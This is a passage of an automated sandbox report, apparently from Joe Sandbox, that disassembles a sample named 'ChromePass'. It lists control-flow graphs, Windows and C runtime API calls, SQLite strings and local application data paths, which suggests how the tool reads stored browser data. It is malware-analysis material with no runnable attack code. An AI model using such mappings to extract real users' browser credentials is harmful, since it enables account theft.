279->286 283 40eceb-40ecf0 281->283 282->283 283->257 288 40ecf2-40ecfc 283->288 290 40ede4-40ee08 call 40e6f7 284->290 285->284 289 40eddd-40eddf 285->289 286->267 288->257 292 40ecfe-40ed01 288->292 289->290 290->234 292->257
                                        APIs
                                          • Part of subcall function 0040B0A5: malloc.MSVCRT ref: 0040B0F0
                                          • Part of subcall function 0040B0A5: malloc.MSVCRT ref: 0040B104
                                          • Part of subcall function 0040B0A5: RtlLeaveCriticalSection.NTDLL(0043551C), ref: 0040B15B
                                        • strlen.MSVCRT ref: 0040EBA8
                                        • strlen.MSVCRT ref: 0040EBDE
                                          • Part of subcall function 0040B358: memset.MSVCRT ref: 0040B371
                                        • memcpy.MSVCRT(?,000007D0,00000001,?,?,?,?,?,?,?,?,?,00410C24,00000000,00000000,0042AC9A), ref: 0040EC5C
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00410C24), ref: 0040EC74
                                        • memcpy.MSVCRT(?,?,00000001), ref: 0040ED34
                                        • strlen.MSVCRT ref: 0040ED3F
                                        • memcpy.MSVCRT(?,?,00000000), ref: 0040ED6D
                                        • memcpy.MSVCRT(?,-journal,00000009), ref: 0040ED82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpy$strlen$malloc$CriticalLeaveSectionmemset
                                        • String ID: -journal
                                        • API String ID: 1510558235-1536856285
                                        • Opcode ID: fbb199ba0ef64d3f97f9b5421cca5cc1d61e37d92d1b1f551cda37044c5f7e6e
                                        • Instruction ID: 1732a50d433f44b5b02993768ac65b073ba47fe387846747f47436a70ea83e0f
                                        • Opcode Fuzzy Hash: fbb199ba0ef64d3f97f9b5421cca5cc1d61e37d92d1b1f551cda37044c5f7e6e
                                        • Instruction Fuzzy Hash: F7B1E371A0460AAFDB14DF6AC840AAABBB4FF44304F14443FE415E7791D738E920CB99
                                        Function 0040D402 Relevance: 13.6, APIs: 9, Instructions: 68fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 296 40d402-40d416 call 40d2cb 299 40d420-40d42b call 40cc6d 296->299 300 40d418-40d41b 296->300 304 40d461-40d46f DeleteFileA 299->304 305 40d42d-40d43b DeleteFileW 299->305 301 40d4a9-40d4ab 300->301 307 40d489-40d491 GetFileAttributesA 304->307 306 40d455-40d45d GetFileAttributesW 305->306 308 40d43d-40d448 306->308 309 40d45f 306->309 310 40d471-40d47c 307->310 311 40d493-40d4a8 free 307->311 308->311 312 40d44a-40d453 Sleep DeleteFileW 308->312 309->311 310->311 313 40d47e-40d487 Sleep DeleteFileA 310->313 311->301 312->306 313->307
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 0040D433
                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 0040D456
                                        • free.MSVCRT ref: 0040D494
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: File$AttributesDeletefree
                                        • String ID:
                                        • API String ID: 899649792-0
                                        • Opcode ID: 21823efabf6285c37c58730a3fdeb471495d32440ef08df67c571e7b1c4d548c
                                        • Instruction ID: d5d8acf5ea5555f551e5f5386180507f99cb375a4ad394c8bf74bc31f1c79b69
                                        • Opcode Fuzzy Hash: 21823efabf6285c37c58730a3fdeb471495d32440ef08df67c571e7b1c4d548c
                                        • Instruction Fuzzy Hash: 6A11A331A057119BD210AFE5ECC5A7E73A5EF41329F500A36F612E61D0CB38AC0A465E
                                        Function 0042182F Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 253COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 314 42182f-421876 call 421733 317 421883-42189d call 41c70f 314->317 318 421878-42187e 314->318 324 4218a3-4218ae 317->324 325 42189f 317->325 319 421af8-421afc 318->319 322 421b07 319->322 323 421afe-421b05 319->323 326 421b0b 322->326 323->322 323->326 327 4218b0-4218b2 324->327 328 4218b7-4218c4 call 40b358 324->328 325->324 329 421b0e-421b11 326->329 327->329 332 4218d2-4218e7 call 411345 328->332 333 4218c6-4218cd 328->333 336 421916-421918 332->336 337 4218e9-4218ec 332->337 333->322 338 42191b-42191e 336->338 339 42195e-42196d memset 337->339 340 4218ee-4218f6 337->340 342 421920-42193b call 413932 338->342 343 42193d-421942 338->343 341 421971-42197e 339->341 344 4218f8-4218fd call 42a676 340->344 345 4218ff 340->345 347 421980-421989 341->347 348 4219cc-4219d6 341->348 342->338 342->343 350 421944-42194c 343->350 351 42196f 343->351 346 421904 344->346 345->346 353 421905-421911 call 40b4a0 346->353 354 4219a7-4219ad 347->354 355 42198b-4219a5 call 41df36 347->355 359 4219db-4219ef 348->359 357 421955 350->357 358 42194e-421953 call 42a676 350->358 351->341 376 421ae9-421af7 call 411369 call 40b168 353->376 354->359 364 4219af-4219b0 354->364 355->359 361 42195a-42195c 357->361 358->361 366 4219f1-4219f6 359->366 367 4219f8 359->367 361->353 372 4219b5-4219c7 call 40b4a0 364->372 366->367 368 4219fa 367->368 369 4219fc-421a15 367->369 368->369 374 421a17-421a1a 369->374 375 421a1c 369->375 372->376 378 421a1f-421a2f 374->378 375->378 376->319 382 421a31 378->382 383 421a35-421a3c 378->383 382->383 385 421a49-421a4c 383->385 386 421a3e-421a44 383->386 388 421a5b-421a5f 385->388 389 421a4e-421a52 385->389 386->372 391 421a61-421a64 388->391 392 421a66-421a92 call 40be35 call 4213a0 388->392 389->388 390 421a54 389->390 390->388 393 421ab1-421ab5 391->393 402 421a97-421aa0 392->402 396 421ab7-421ac7 call 41c8c3 393->396 397 421ac9-421acc 393->397 396->397 400 421ad7-421ae6 397->400 401 421ace-421ad5 397->401 400->376 401->376 401->400 404 421aa2-421aa5 402->404 405 421aa8-421aaf call 40b168 402->405 404->405 405->393
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BINARY$CREATE TABLE sqlite_master( type text, name text, tbl_name text, rootpage integer, sql text)$SELECT name, rootpage, sql FROM '%q'.%s$attached databases must use the same text encoding as main database$sqlite_master$unknown error$unsupported file format
                                        • API String ID: 0-396201868
                                        • Opcode ID: 0dbd58db18a303ede070059acf98b40a1b07f1af334670792e97db6cd46daae2
                                        • Instruction ID: 262f377a753724a7193ef86df1f6d7a84022e52c7a7eaf545041a9d1d484f6cd
                                        • Opcode Fuzzy Hash: 0dbd58db18a303ede070059acf98b40a1b07f1af334670792e97db6cd46daae2
                                        • Instruction Fuzzy Hash: 17A1D470B00254EFDB14CF95E880AAEBBF5EF55304F64806BE401AB362D778DA81CB19
                                        Function 004213A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 220COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 408 4213a0-4213c1 409 4213c3-4213c5 408->409 410 4213ca-4213d0 call 40b344 408->410 411 42163d-421643 409->411 413 4213d5-4213d9 410->413 414 4213f5-4213fb 413->414 415 4213db-4213e0 413->415 417 4215a8-4215ae 414->417 418 421401-421426 call 421e76 414->418 416 4213e6-4213ef 415->416 415->417 416->414 416->417 420 4215b0 call 4161c6 417->420 421 4215b5-4215ba 417->421 418->413 426 421428-42142e 418->426 420->421 424 4215c6-4215d7 call 40b517 421->424 425 4215bc-4215c5 call 40b168 421->425 433 421621-421626 424->433 434 4215d9-4215e2 call 42a9c6 424->434 425->424 429 421430-421437 426->429 430 421439-42143f 426->430 429->413 435 421443-421447 call 41637d 430->435 438 42162b-42163b RtlLeaveCriticalSection 433->438 439 421628 433->439 434->433 442 4215e4-4215e9 434->442 441 42144c-421454 435->441 438->411 439->438 443 42145a-42145d 441->443 444 42153e-421543 441->444 442->438 445 4215eb-421607 call 42a958 strlen call 40b0a5 442->445 447 42147e-421482 443->447 448 42145f-421462 443->448 444->435 446 421549-42155f call 4161c6 444->446 445->438 479 421609-42161f call 42a958 memcpy 445->479 467 421582-421592 call 40b168 446->467 468 421561-42156c 446->468 449 421484-421488 447->449 450 4214d5-4214da 447->450 448->444 453 421468-42146c 448->453 454 4214a6-4214aa 449->454 455 42148a-4214a0 call 40b37e 449->455 457 421525-421539 450->457 458 4214dc-4214e9 450->458 453->446 460 421472-421478 453->460 462 4214cb-4214d3 454->462 463 4214ac-4214c0 call 4165ef 454->463 455->417 455->454 480 4215a0 457->480 481 42153b 457->481 465 421523 458->465 466 4214eb-421501 call 4165d1 458->466 460->446 460->447 462->450 483 4214c6-4214c9 463->483 484 421597-42159e 463->484 465->457 486 421503-42151c call 416554 call 4165ad 466->486 487 42151e-421521 466->487 467->413 475 421574-421580 isspace 468->475 475->467 476 42156e-421571 475->476 476->475 479->438 480->417 481->444 483->462 483->463 484->417 486->484 486->487 487->465 487->466
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d$sqlite_master
                                        • API String ID: 0-2024178973
                                        • Opcode ID: fd87d88d8173a76365dedaef42ca68be072c9ea8b686464921c50fd662290fb9
                                        • Instruction ID: 26b11de5f6bb12c0c6a6b2ac4e126577f77fe26de064d4a84f2ce22cd1c4592d
                                        • Opcode Fuzzy Hash: fd87d88d8173a76365dedaef42ca68be072c9ea8b686464921c50fd662290fb9
                                        • Instruction Fuzzy Hash: C0818C716083229FCB10DF25E88051FBBE4AFA4358F94096FF88596261D738CD85CB9A
                                        Function 0040244F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 493 40244f-40249b memset 494 4024a1-4024c7 wcslen * 2 493->494 495 402535-40253b call 40a919 493->495 497 4024c9-4024da call 404d63 494->497 498 4024dc 494->498 499 402540-402553 call 40226e 495->499 501 4024e4-402510 call 40226e wcslen * 2 497->501 498->501 507 402512-402529 call 404d63 501->507 508 40252b-402533 501->508 507->499 508->499
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcslen$memsetwcscatwcscpy
                                        • String ID: AppData\Local$Local Settings\Application Data
                                        • API String ID: 3932597654-2996314811
                                        • Opcode ID: 69e01f8076d3b357dd7e221ab67cb876b231f79aa770a8d6094f68b35eb08fdc
                                        • Instruction ID: 06701e109a7cb230437e1991fe34eff5cd467569b5a47b7ee8921bcf04c6820e
                                        • Opcode Fuzzy Hash: 69e01f8076d3b357dd7e221ab67cb876b231f79aa770a8d6094f68b35eb08fdc
                                        • Instruction Fuzzy Hash: 1321877294411DABDB10EB50DE8AACDB7A9AF10319F5000BBE908F31C1EB785F448A59
                                        Function 004230D6 Relevance: 9.4, APIs: 1, Strings: 5, Instructions: 390stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 511 4230d6-4230ee 512 4230f4-4230fc 511->512 513 423528-42352a 511->513 512->513 514 423102-423105 512->514 515 42352b-42352f 513->515 514->513 516 42310b-423122 call 41d9dc 514->516 519 423124-423128 516->519 520 42318e-42319b call 42227a 516->520 522 42325e-423260 519->522 523 42312e-423133 519->523 520->513 527 4231a1-4231aa 520->527 522->515 525 423135-42313b call 41c77c 523->525 526 42317d-423189 523->526 532 423140-423149 525->532 526->519 529 42318b 526->529 530 4231ac 527->530 531 4231dd-4231e3 527->531 529->520 533 4231af-4231b6 530->533 535 4234eb-4234f2 531->535 536 4231e9-4231fb 531->536 532->513 534 42314f-423156 532->534 533->531 537 4231b8-4231bb 533->537 534->526 538 423158-423162 call 41d732 534->538 539 423513-42351a 535->539 540 4234f4-4234fc 535->540 541 423208 536->541 542 4231fd-423206 536->542 543 4231d5-4231db 537->543 544 4231bd-4231c2 537->544 538->513 558 423168-42316b 538->558 547 423523-423526 539->547 548 42351c 539->548 540->539 546 4234fe-42350c call 40c0cc 540->546 549 42320b-423210 541->549 542->541 542->549 543->531 543->533 544->543 552 4231c4-4231c7 544->552 546->539 547->515 548->547 550 423216-42321b 549->550 551 4234dc-4234e9 call 419e47 549->551 555 42321d-423224 550->555 551->535 552->543 557 4231c9-4231ce 552->557 560 423276-42327c 555->560 561 423226-423229 555->561 557->543 563 4231d0-4231d3 557->563 558->526 564 42316d-42317a call 419bd5 558->564 568 423296 560->568 569 42327e-423283 560->569 565 423237-42324b call 419cac 561->565 566 42322b-423230 561->566 563->531 563->543 564->526 583 423265 565->583 584 42324d-42325c 565->584 566->565 571 423232-423235 566->571 570 423299-4232a2 568->570 569->568 574 423285-423294 call 41cb8f 569->574 575 423492-423499 570->575 576 4232a8-4232b4 570->576 571->560 571->565 574->570 581 4234ab-4234b0 call 40c0cc 575->581 582 42349b-4234a9 call 40c0cc 575->582 580 4232b7-4232c4 576->580 585 4232c6-4232c9 580->585 586 4232cb-4232d0 580->586 593 4234b5-4234b6 581->593 582->593 588 42326c-423271 583->588 584->588 585->586 590 4232d2-4232d7 585->590 586->590 592 4234c8-4234d6 588->592 594 4232f7-423306 590->594 595 4232d9-4232db 590->595 592->551 592->555 596 4234bd-4234c6 call 40b168 593->596 597 423462-423480 594->597 599 42330c-42330f 594->599 595->597 598 4232e1-4232e4 595->598 596->592 597->580 602 423486-423490 597->602 598->597 603 4232ea-4232f1 call 40c174 598->603 604 423314-423324 599->604 602->575 602->596 603->594 603->597 605 423326-42332a 604->605 606 42334f-42336a call 419512 604->606 608 42332c-423337 call 4220e8 605->608 609 42333d-423349 call 41d8e3 605->609 606->597 617 423370-423387 call 422119 606->617 608->609 618 42344f-42345c 608->618 609->606 609->618 622 423420-42342d 617->622 623 42338d-423390 617->623 618->597 620 423311 618->620 620->604 624 423431-42343b 622->624 625 423392-423399 623->625 626 42339f-4233cb call 419512 * 2 623->626 628 423440 624->628 629 42343d-42343e 624->629 625->622 625->626 626->597 636 4233d1-4233fd call 422119 call 40be35 626->636 630 423441-42344e call 419cac 628->630 629->630 630->618 641 423408 636->641 642 4233ff-423406 strlen 636->642 643 42340a-42341e 641->643 642->643 643->624
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: %s.%s$no such table: %s$no tables specified$too many columns in result set$>B
                                        • API String ID: 39653677-4135391130
                                        • Opcode ID: 2a54dacd3136a16c71cc0564ebcf3d1b3cccd856b24915ac04d2e1659a7a1fe4
                                        • Instruction ID: 2fe2712b2c084e770219046fa2d6f9b8a09801a94f1ee17c50ed802ec21f6b52
                                        • Opcode Fuzzy Hash: 2a54dacd3136a16c71cc0564ebcf3d1b3cccd856b24915ac04d2e1659a7a1fe4
                                        • Instruction Fuzzy Hash: A0E16071A00229EFDF15DF95E4806AEB7B1BF48315F64809BE805AB351D73CAE81CB58
                                        Function 0040A919 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040A8EA: LoadLibraryW.KERNEL32(shell32.dll,0040A928,?), ref: 0040A8F8
                                          • Part of subcall function 0040A8EA: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040A90D
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040A93C
                                        • memset.MSVCRT ref: 0040A958
                                        • RegCloseKey.ADVAPI32(?,00A524F0,?,?,?,?,?), ref: 0040A98F
                                        • wcscpy.MSVCRT ref: 0040A99E
                                          • Part of subcall function 00404D2E: GetVersionExW.KERNEL32(004355D8,00A524F0,0040A937,?), ref: 00404D48
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                        • String ID: @%@
                                        • API String ID: 2699640517-301254053
                                        • Opcode ID: c85f144fac34b3a79468d4b7e9426a826a46006cdde34c786ca7b16a021c4ff8
                                        • Instruction ID: b7cd3f15b71cd0ad239d335dfb1030cea571aafd2f0d5927420644d2378f0aab
                                        • Opcode Fuzzy Hash: c85f144fac34b3a79468d4b7e9426a826a46006cdde34c786ca7b16a021c4ff8
                                        • Instruction Fuzzy Hash: E601B1B2500218AEEB21B755EC4AEAF737DDF84314F20047BF909B1081EA785E519A6A
                                        Function 0040D302 Relevance: 7.6, APIs: 5, Instructions: 95fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 658 40d302-40d30b 659 40d3a9-40d3b7 call 40d2cb 658->659 662 40d310-40d377 call 40cc6d 659->662 663 40d3bd 659->663 668 40d381 CreateFileA 662->668 669 40d379-40d37f CreateFileW 662->669 664 40d3bf-40d3c0 663->664 666 40d3fd-40d401 664->666 670 40d387-40d38c 668->670 669->670 671 40d3c6-40d3cb 670->671 672 40d38e-40d39b free 670->672 675 40d3da-40d3fb memset free 671->675 676 40d3cd-40d3d8 671->676 673 40d3c2-40d3c4 672->673 674 40d39d-40d3a6 672->674 673->664 674->659 675->666 676->675
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: free$CreateFilememset
                                        • String ID:
                                        • API String ID: 2788672648-0
                                        • Opcode ID: 16eabc54f8117ac22137bdf6d5286ec79333c897b9022d702143434dc562c034
                                        • Instruction ID: 54aeaa6a2a1cf82cd853e95d5e6fbbb13f587397237ff6230706a4c831c0e42a
                                        • Opcode Fuzzy Hash: 16eabc54f8117ac22137bdf6d5286ec79333c897b9022d702143434dc562c034
                                        • Instruction Fuzzy Hash: AC21E472E10215ABEB109FA5ED02B9E3BA0AB00714F25413AFD05F72C1D6788D14979A
                                        Function 004094D3 Relevance: 7.6, APIs: 5, Instructions: 59windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 677 4094d3-4094fa ??2@YAPAXI@Z 678 409515 677->678 679 4094fc-409513 677->679 680 409517-40952a ??2@YAPAXI@Z 678->680 679->680 681 409533 680->681 682 40952c-409531 call 4026fa 680->682 684 409535-409543 681->684 682->684 686 409552-4095a7 call 404d08 call 401000 GetModuleHandleW LoadIconW call 401561 684->686 687 409545-40954c DeleteObject 684->687 687->686
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000420,00000000,?,?,?,004097B7), ref: 004094F2
                                        • ??2@YAPAXI@Z.MSVCRT(00000D08,00000000,?,?,?,004097B7), ref: 00409522
                                        • DeleteObject.GDI32(?), ref: 00409546
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,004097B7), ref: 0040958C
                                        • LoadIconW.USER32(00000000,00000065), ref: 00409595
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                        • String ID:
                                        • API String ID: 659443934-0
                                        • Opcode ID: 413f477a48ca695b15e951cecf6be7b012c71d6df656ba6907d2bf537f542b32
                                        • Instruction ID: 1f32562663df79b2ec97770a1dd64008754b28810ad5a2be0de314d305e9853f
                                        • Opcode Fuzzy Hash: 413f477a48ca695b15e951cecf6be7b012c71d6df656ba6907d2bf537f542b32
                                        • Instruction Fuzzy Hash: 01118EB1A017049FC720AF76AC49697BBE8EF40714F914A2FE05E93252DF7964118B5C
                                        Function 0041FE26 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 119stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 694 41fe26-41fe2f 695 41fe31-41fe4e call 42a7bb 694->695 697 41fe53-41fe5c 695->697 698 41fe9f-41fea8 697->698 699 41fe5e-41fe8e strlen call 41df67 697->699 698->695 701 41feaa-41feda call 42a7bb * 2 698->701 704 41fe90-41fe97 699->704 705 41fe9d 699->705 710 41fedc-41ff0c call 42a7bb 701->710 704->705 707 41fe99 704->707 705->698 707->705 713 41ff49-41ff52 710->713 714 41ff0e-41ff38 strlen call 41df67 710->714 713->710 716 41ff54 713->716 719 41ff47 714->719 720 41ff3a-41ff41 714->720 718 41ff56-41ff79 call 42a7bb 716->718 724 41ff7b-41ff7e 718->724 719->713 720->719 722 41ff43 720->722 722->719 725 41ff90-41ff9c call 41ffcf 724->725 726 41ff80-41ff8a call 42a893 724->726 726->725 731 41ff8c 726->731 731->725
                                        APIs
                                          • Part of subcall function 0042A7BB: strlen.MSVCRT ref: 0042A7E2
                                        • strlen.MSVCRT ref: 0041FE75
                                          • Part of subcall function 0041DF67: memcpy.MSVCRT(0000001C,0042AD04,00000000), ref: 0041E032
                                        • strlen.MSVCRT ref: 0041FF1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: strlen$memcpy
                                        • String ID: sqlite_attach$sqlite_detach
                                        • API String ID: 3396830738-2911676521
                                        • Opcode ID: cbd989dd5f3dfdd19fe536a7f8247246f5a83751997b85c6d5ef52342c090b33
                                        • Instruction ID: 9f800a9b43953b92a13c2d88aa0105c020479341f39a39680abb38540f6e8e79
                                        • Opcode Fuzzy Hash: cbd989dd5f3dfdd19fe536a7f8247246f5a83751997b85c6d5ef52342c090b33
                                        • Instruction Fuzzy Hash: 8D312FF1F002D83EDF11A9658D41FFF3959DF01309F850067FC0849552D9994E9692AF
                                        Function 0040CE7A Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0040CE9E
                                        • GetLastError.KERNEL32 ref: 0040CEA9
                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0040CECB
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
